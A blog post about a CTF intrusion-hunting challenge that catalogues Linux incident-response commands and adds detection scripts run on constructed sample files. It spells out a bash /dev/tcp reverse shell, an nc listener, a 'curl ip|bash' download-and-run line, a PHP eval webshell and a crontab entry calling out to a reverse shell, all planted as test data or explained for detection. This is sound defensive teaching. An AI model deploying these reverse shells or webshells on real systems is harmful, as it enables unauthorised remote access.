From the catf1ag two-hour AK match PWN/ATTACK intrusion-hunting write-up to a guide of common emergency-response commands


Preface

Recently I have read more than half of the Practical Guide to Network Security Emergency Response Technology (Qianxin), and then ran into the intrusion-hunting PWN challenge on the catf1ag platform. This post records the solve and summarises the intrusion-hunting commands used on a Linux system.


1, Basic emergency response skills on Linux

1. System checks

(1) Basic system information

lscpu	CPU information: model, clock speed, core count
uname -a	Kernel release, hostname and architecture of the running system
cat /proc/version	Kernel version string, including the compiler it was built with
lsmod	All kernel modules currently loaded (an unfamiliar module is a classic hiding place for a kernel rootkit)

(2) User information

cat /etc/passwd	Account list. Each line has seven colon-separated fields: user name, password placeholder (x; the hash lives in /etc/shadow), UID, GID, comment, home directory, login shell. A shell of /bin/bash means the account can log in interactively; /sbin/nologin (or /bin/false) means it cannot.
awk -F: '{if($3==0)print $1}' /etc/passwd	Accounts with UID 0 (superuser). Anything other than root here needs an explanation.
awk -F: 'length($2)==0 {print $1}' /etc/shadow	Accounts with an empty password field, i.e. login without a password. Needs root to read /etc/shadow; locked accounts show * or ! in that field, which is not empty.
lastb	Failed login attempts (reads /var/log/btmp)
lastlog	Most recent login of every account on the system
last	Recent successful logins, logouts and reboots (reads /var/log/wtmp). wtmp stores successful logins, btmp failed logins, and /var/run/utmp the sessions currently open.
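The three account checks above, wrapped as functions and run against constructed passwd/shadow files so the output is reproducible. This is an added example, not code from the original post; hacker_v is the rogue account from the challenge, while the "backdoor" UID-0 account and the hash values are made up. On a host under investigation point the functions at the real /etc/passwd and /etc/shadow (as root).

```shell
# Added example, not from the original post: the /etc/passwd and /etc/shadow
# checks as functions, run against constructed sample files.

# Accounts with UID 0: anything other than root here needs an explanation.
find_uid0() {            # $1 = passwd file
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Accounts whose hash field is empty. Locked accounts show "*" or "!" there,
# which is not empty, so they are correctly left out.
find_empty_pw() {        # $1 = shadow file
    awk -F: 'length($2) == 0 { print $1 }' "$1"
}

# Accounts with an interactive shell, i.e. able to log in: compare this list
# with the accounts the admins know about.
find_login_shells() {    # $1 = passwd file
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 ":" $7 }' "$1"
}

# --- constructed sample data (hacker_v is the rogue account from the challenge;
# "backdoor" is an invented second UID-0 account; hashes are placeholders) ---
WORK=$(mktemp -d)
cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
hacker_v:x:1001:1001::/home/hacker_v:/bin/bash
backdoor:x:0:0::/root:/bin/bash
EOF
cat > "$WORK/shadow" <<'EOF'
root:$6$saltsalt$hashhashhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
hacker_v::19000:0:99999:7:::
backdoor:$6$saltsalt$hashhashhash:19000:0:99999:7:::
EOF

echo "UID 0 accounts:";       find_uid0 "$WORK/passwd"
echo "empty password field:"; find_empty_pw "$WORK/shadow"
echo "interactive shells:";   find_login_shells "$WORK/passwd"
```

On a real host, diff the interactive-shell list against the last known-good baseline (or the company user directory); a brand-new UID-0 or empty-password account is the fastest win in this whole checklist.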

(3) Startup items

cat /etc/init.d/rc.local	rc.local under init.d (present on some distributions)
cat /etc/rc.local	Commands run at the end of boot; a one-liner appended here is a common persistence trick
ls -alt /etc/init.d	All init scripts sorted by modification time, so a recently added or edited script stands out
systemctl list-unit-files --state=enabled	On systemd hosts, the enabled units; review these as well as rc.local

(4) Scheduled tasks

Scheduled tasks live under /etc/cron* and in the per-user crontab spool.

crontab -l	Scheduled tasks of the current user
crontab -u username -l	Scheduled tasks of a given user
ls /etc/cron*	All system-wide cron files and directories
The files and directories to review are usually:
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/*
/etc/anacrontab
/var/spool/cron/* (RHEL/CentOS) or /var/spool/cron/crontabs/* (Debian/Ubuntu), the per-user crontabs that crontab -l reads
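Rather than cat-ing each of the locations above by hand, the following added example (not from the original post) gathers every real crontab entry into one file:line:entry list and then flags the entries that carry typical reverse-shell or dropper patterns. The functions take a root prefix so they can run offline against a constructed tree; on a live host call them with "" (or no argument). The cron.d file name, the 198.51.100.7 address and port 4444 in the sample data are made up.

```shell
# Added example, not from the original post: collect and triage cron entries.

# Files that hold crontab-format lines (the run-parts directories hold scripts
# rather than crontab lines; see list_cron_scripts).
cron_files() {           # $1 = root prefix ("" for the live system)
    for f in "$1/etc/crontab" "$1/etc/anacrontab" "$1"/etc/cron.d/* \
             "$1"/var/spool/cron/* "$1"/var/spool/cron/crontabs/*; do
        [ -f "$f" ] && echo "$f"
    done
    return 0
}

# Every real entry as file:line:entry; comments, blank lines and VAR=value
# assignments are dropped.
list_cron_entries() {    # $1 = root prefix
    cron_files "$1" | while read -r f; do
        grep -HnvE '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$f" || true
    done
    return 0
}

# Entries worth a second look: bash /dev/tcp shells, download-and-run,
# payloads parked in world-writable directories, base64 blobs.
flag_suspicious() {      # $1 = root prefix
    cron_files "$1" | while read -r f; do
        grep -HnE '/dev/tcp/|bash -i|curl |wget |base64|/tmp/|/dev/shm/' "$f" || true
    done
    return 0
}

# Scripts in the run-parts directories, newest first.
list_cron_scripts() {    # $1 = root prefix
    for d in "$1"/etc/cron.hourly "$1"/etc/cron.daily "$1"/etc/cron.weekly "$1"/etc/cron.monthly; do
        [ -d "$d" ] && ls -lt "$d"
    done
    return 0
}

# --- constructed sample tree: one legitimate system crontab, one dropper in
# cron.d, one user crontab with a reverse shell (IP and port are made up) ---
WORK=$(mktemp -d)
mkdir -p "$WORK/etc/cron.d" "$WORK/etc/cron.hourly" "$WORK/var/spool/cron/crontabs"
cat > "$WORK/etc/crontab" <<'EOF'
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
EOF
cat > "$WORK/etc/cron.d/sysupdate" <<'EOF'
*/5 * * * * root /tmp/.x/she11.sh
EOF
cat > "$WORK/var/spool/cron/crontabs/www-data" <<'EOF'
@reboot bash -c 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'
EOF

echo "all entries:";        list_cron_entries "$WORK"
echo "suspicious entries:"; flag_suspicious "$WORK"
echo "run-parts scripts:";  list_cron_scripts "$WORK"
```

The pattern list is deliberately short; on a real host expect a few false positives (backup jobs that curl an internal endpoint, for instance) and verify each hit with stat on the referenced script.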

2. Process checks

(1) Service checks

netstat	Find suspicious ports and peer IPs, e.g. netstat -antlp (TCP sockets with owning PID/program name) or netstat -ano
ls -al /proc/PID	The process's exe, cwd and fd symlinks; /proc/PID/exe points at the binary even after it has been deleted from disk
lsof -p PID	Files and sockets opened by the process
kill -9 PID	Kill the process with that PID
rm -rf filename	Delete a file; if even root cannot delete it, the file most likely has the immutable (i) attribute set
lsattr filename	Show file attributes
chattr -i filename	Remove the immutable attribute
ps -e -o pid= | sort -n > 1; ls /proc | grep -E '^[0-9]+$' | sort -n > 2; diff 1 2	Compare the PIDs ps reports with the numeric entries in /proc; a PID present in /proc but missing from ps points to a process hidden from ps
chkconfig --list	Services enabled per SysV runlevel 0-6: 0 halt, 1 single user, 2 multi-user without network, 3 multi-user with network, 4 unused, 5 multi-user with graphical login, 6 reboot
top	Processes with high CPU or memory usage
ps	Process listing, e.g. ps -ef or ps aux
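The ps-versus-/proc comparison from the list above, as an added example that is not part of the original post. PIDs that appear under /proc but not in the ps listing are candidates for a process hidden by a userland rootkit that hooks ps or readdir. hidden_pids works on two saved listings so it can be exercised on constructed data; live_hidden_pids takes the listings from the host.

```shell
# Added example, not from the original post: find PIDs that /proc knows about
# but ps does not show.

# $1 = file with one PID per line (ps -e -o pid=), $2 = file with the output of ls /proc
hidden_pids() {
    t=$(mktemp -d)
    # keep only numeric entries: ls /proc also lists cpuinfo, self, sys, ...
    awk '$1 ~ /^[0-9]+$/ { print $1 }' "$1" | sort > "$t/ps"
    awk '$1 ~ /^[0-9]+$/ { print $1 }' "$2" | sort > "$t/proc"
    comm -13 "$t/ps" "$t/proc"        # lines only in the /proc listing
    rm -rf "$t"
}

# Live version. The two snapshots are not taken at the same instant, so a
# process that starts or exits in between shows up as a false positive:
# run it more than once and only trust a PID that persists.
live_hidden_pids() {
    t=$(mktemp -d)
    ps -e -o pid= > "$t/ps"
    ls /proc > "$t/proc"
    hidden_pids "$t/ps" "$t/proc"
    rm -rf "$t"
}

# --- constructed listings: PID 4242 exists in /proc but ps does not show it ---
WORK=$(mktemp -d)
printf '    1\n    2\n  100\n 1337\n' > "$WORK/ps"
printf '1\n100\n1337\n2\n4242\nacpi\ncpuinfo\nself\nsys\n' > "$WORK/proc"

echo "PIDs present in /proc but missing from ps:"
hidden_pids "$WORK/ps" "$WORK/proc"
```

If a PID persists across runs, inspect it directly: cat /proc/PID/cmdline, ls -l /proc/PID/exe and ls -l /proc/PID/fd still work even when ps has been trojaned, because they read the kernel's view rather than a userland binary.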

(2) File trace checks

Common sensitive locations on Linux are /tmp and the command directories /usr/bin and /usr/sbin: /tmp is where malware is usually downloaded to, and the command directories are where system binaries get replaced with trojaned copies.
find	Search under a given directory
-type b/d/c/p/l/f	Match block device, directory, character device, named pipe, symbolic link, regular file
-mtime -n / +n	Filter by content modification time: -n means modified less than n days ago, +n more than n days ago
-atime -n / +n	Filter by last access time (same sign convention)
-ctime -n / +n	Filter by inode change time, i.e. the last change to permissions, owner, attributes or content. This is not creation time, which classic find cannot test for (stat shows a Birth field on newer kernels and file systems)
stat	Show a file's access, modify and change times (and birth time where supported), size, inode, owner and permissions
chkrootkit	Scan for known rootkits and backdoors; lines marked INFECTED indicate a detected backdoor


Examples:
find / -atime -5 -name "*.php"	.php files accessed within the last five days (without the minus sign, -atime 5 means exactly five days ago)
find / -ctime -5 -name "*.sh"	.sh files whose inode changed within the last five days (newly created files included, since creation sets the ctime)
find /directory -perm 777	Files whose mode is exactly 777; find /directory -perm -o+w lists everything world-writable
stat test.php	Details and timestamps of test.php
find / -name "*.php" | xargs egrep "assert|eval|exec|shell_exec|POST"	Hunt for webshells: PHP files containing assert, eval, exec, shell_exec or POST handling
ls -alt /bin	Modification times of the system commands, newest first; a freshly modified ls, ps or netstat is a red flag
ls -alh /bin	File sizes of the system commands, to spot a replaced binary
rpm -Va | grep '^..5'	(RHEL/CentOS) Files whose checksum no longer matches the package database; on Debian/Ubuntu use debsums -c

(3) Log analysis

/var/log/wtmp	Logins, logouts, shutdowns and reboots (binary; read with last)
/var/log/cron	Cron job execution log
/var/log/messages	General system messages and errors after boot
/var/log/apache2/access.log	Apache access log (Debian/Ubuntu path; /var/log/httpd/access_log on RHEL/CentOS)
/var/log/auth.log	Authentication events: sshd, sudo, su (Debian/Ubuntu)
/var/log/secure	The same authentication events on RHEL/CentOS: which account tried to log in from where, and whether it succeeded
/var/log/faillog	Failed login records (read with faillog -a)
cat /var/log/secure | awk '/Accepted/{print $(NF-3)}' | sort | uniq -c | awk '{print $2"="$1;}'	(CentOS) Successful SSH logins per source IP. To measure brute forcing, match "Failed password" instead: grep "Failed password" /var/log/secure | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn
grep "Accepted" /var/log/secure | awk '{print $1,$2,$3,$9,$11}'	Date, user name and source IP of every successful login
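The two auth-log one-liners above as functions, run over constructed sshd log lines in the RHEL/CentOS /var/log/secure format (on Debian/Ubuntu point them at /var/log/auth.log). This is an added example, not code from the original post; the host name web1, the 10.0.0.5 address, the deploy user and the timestamps are made up, while 1.15.155.181 is the IP from the challenge flag. The source IP is taken as the field after "from" rather than $(NF-3), so "Accepted publickey ... ssh2: RSA SHA256:..." lines, which have extra trailing fields, are parsed correctly too.

```shell
# Added example, not from the original post: per-IP login statistics from sshd logs.

# Successful logins per source IP, as ip=count.
accepted_by_ip() {       # $1 = log file
    awk '/sshd.*Accepted/ { for (i = 1; i <= NF; i++) if ($i == "from") print $(i+1) }' "$1" \
      | sort | uniq -c | sort -rn | awk '{ print $2 "=" $1 }'
}

# Failed attempts per source IP: this, not the Accepted count, is the brute-force signal.
failed_by_ip() {         # $1 = log file
    awk '/sshd.*Failed password/ { for (i = 1; i <= NF; i++) if ($i == "from") print $(i+1) }' "$1" \
      | sort | uniq -c | sort -rn | awk '{ print $2 "=" $1 }'
}

# Date, user and source IP of every successful login.
accepted_detail() {      # $1 = log file
    awk '/sshd.*Accepted/ {
             for (i = 1; i <= NF; i++) { if ($i == "for") u = $(i+1); if ($i == "from") ip = $(i+1) }
             print $1, $2, $3, u, ip }' "$1"
}

# --- constructed log: three failures then a success from the IP in the
# challenge flag, plus an unrelated key-based login from an internal address ---
LOG=$(mktemp)
cat > "$LOG" <<'EOF'
May 13 01:02:03 web1 sshd[1211]: Failed password for root from 1.15.155.181 port 50311 ssh2
May 13 01:02:05 web1 sshd[1211]: Failed password for root from 1.15.155.181 port 50311 ssh2
May 13 01:02:07 web1 sshd[1213]: Failed password for invalid user admin from 1.15.155.181 port 50312 ssh2
May 13 01:02:09 web1 sshd[1215]: Accepted password for root from 1.15.155.181 port 50322 ssh2
May 13 01:10:40 web1 sshd[1302]: Accepted publickey for deploy from 10.0.0.5 port 41022 ssh2: RSA SHA256:2f3a
May 13 01:11:02 web1 sshd[1215]: pam_unix(sshd:session): session opened for user root by (uid=0)
EOF

echo "successful logins per IP:"; accepted_by_ip "$LOG"
echo "failed attempts per IP:";   failed_by_ip "$LOG"
echo "successful login details:"; accepted_detail "$LOG"
```

Read the two counts together: an IP with many failures followed by one success is the password-guessing pattern, and its first Accepted timestamp is the anchor for the rest of the timeline (compare it with the ctime of the dropped files).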


(4) Traffic analysis

Capture with tcpdump on the host and analyse the pcap in Wireshark, filtering on the suspicious peer IPs and ports found with netstat.

2, The catf1ag AK PWN challenge in detail

Challenge description:

One day the catf1ag platform received a remote-login alert e-mail. After checking with the internal team, nobody had logged in, so admin logged in to the server and found it had been compromised: a scheduled reverse-shell script and a backdoor file had been planted. Log in to the server, investigate, find the reverse-shell file and the remote login IP, work out the connection password of the PHP backdoor file, and identify the newly created abnormal user.

The description gives it away: a PHP webshell was dropped on the server and a bash reverse shell was planted alongside it. The usual bash reverse shell is

bash -i >& /dev/tcp/ip/port 0>&1

or

bash -c "bash -i >& /dev/tcp/ip/port 0>&1"	# ip = attacker IP, port = attacker listening port

Piece by piece:

bash -i	starts an interactive bash
>& /dev/tcp/ip/port	redirects both stdout and stderr to /dev/tcp/ip/port. This is not a real device but a bash feature: opening that path makes bash connect to ip:port over TCP
0>&1	makes stdin a copy of stdout, so the shell reads its commands from that same TCP connection

Put together: an interactive bash whose output goes to a TCP connection the victim opens to the attacker, and whose input comes back over the same connection, i.e. a shell the attacker can type into. Because the victim initiates the connection, it passes through firewalls that only block inbound traffic.

On the attacker's side:

nc -lvvp port	listen for the incoming connection

The script is often fetched and executed on the victim in one step, which is the pattern to look for in shell history and cron entries:

curl ip|bash

Log in to the server with ssh.

First hunt for the webshell with find: find / -name "*.php" |xargs egrep "eval|POST"

Then hunt for the reverse-shell script the same way: find / -name "*.sh" |xargs egrep "bash|dev|tcp"
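The two hunts above, and the find/egrep entries in the file-trace section, as reusable functions run over a constructed directory tree so the result is reproducible offline. This is an added example, not code from the original post: the directory layout, the index.php and backup.sh files and port 4444 are made up, while she11.sh, the cat_f1ag_666 password and the 1.15.155.181 address are taken from the challenge flag. On a live host call the functions with "/" and expect noise from legitimate code; hits are leads to inspect with stat and cat, not verdicts.

```shell
# Added example, not from the original post: webshell and reverse-shell hunting.

# PHP files that contain a code-execution primitive or read a raw POST/REQUEST value.
hunt_php() {        # $1 = directory to search
    find "$1" -type f -name '*.php' \
         -exec grep -lE 'assert\(|eval\(|exec\(|shell_exec\(|system\(|passthru\(|\$_(POST|REQUEST)\[' {} + 2>/dev/null \
      | sort
}

# Shell scripts carrying the bash reverse-shell idiom (or an nc -e equivalent).
hunt_sh() {         # $1 = directory to search
    find "$1" -type f -name '*.sh' \
         -exec grep -lE '/dev/tcp/|bash -i|nc .* -e |0>&1' {} + 2>/dev/null \
      | sort
}

# Regular files modified within the last N days (find -mtime -N), any extension:
# run it over the sensitive directories named in the text (/tmp, /usr/bin, /usr/sbin).
recent_files() {    # $1 = directory, $2 = days
    find "$1" -type f -mtime "-$2" 2>/dev/null | sort
}

# --- constructed sample tree: a clean page, a one-line eval webshell under
# uploads/, the reverse-shell script hidden in /tmp, and a harmless backup script ---
WORK=$(mktemp -d)
mkdir -p "$WORK/var/www/html/uploads" "$WORK/tmp/.x" "$WORK/usr/local/bin"
printf '<?php echo "hello"; ?>\n' > "$WORK/var/www/html/index.php"
printf '<?php @eval($_POST["cat_f1ag_666"]); ?>\n' > "$WORK/var/www/html/uploads/logo.php"
printf '#!/bin/bash\nbash -i >& /dev/tcp/1.15.155.181/4444 0>&1\n' > "$WORK/tmp/.x/she11.sh"
printf '#!/bin/sh\ntar czf /var/backups/www.tgz /var/www\n' > "$WORK/usr/local/bin/backup.sh"

echo "webshell candidates:";           hunt_php "$WORK"
echo "reverse-shell candidates:";      hunt_sh "$WORK"
echo "files modified in the last day:"; recent_files "$WORK" 1
```

The webshell's POST parameter name (here cat_f1ag_666) is the "connection password" the challenge asks for: it is the key a tool such as a webshell manager sends the payload under, so once the file is found the password is read straight out of the eval line.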

 

Check /etc/passwd for the new account: cat /etc/passwd reveals the hacker_v user.

Final flag: catf1ag{1.15.155.181-she11.sh-cat_f1ag_666-hacker_v}

Summary

Emergency response needs the ability to collect, store and search data, to discover events, to analyse them, to judge their severity, to handle them, and to trace an attack back to its source. A follow-up post will cover the same drill on Windows.

Tags: Web Development Linux Web Security

Posted by dewen on Fri, 13 May 2022 02:30:13 +0300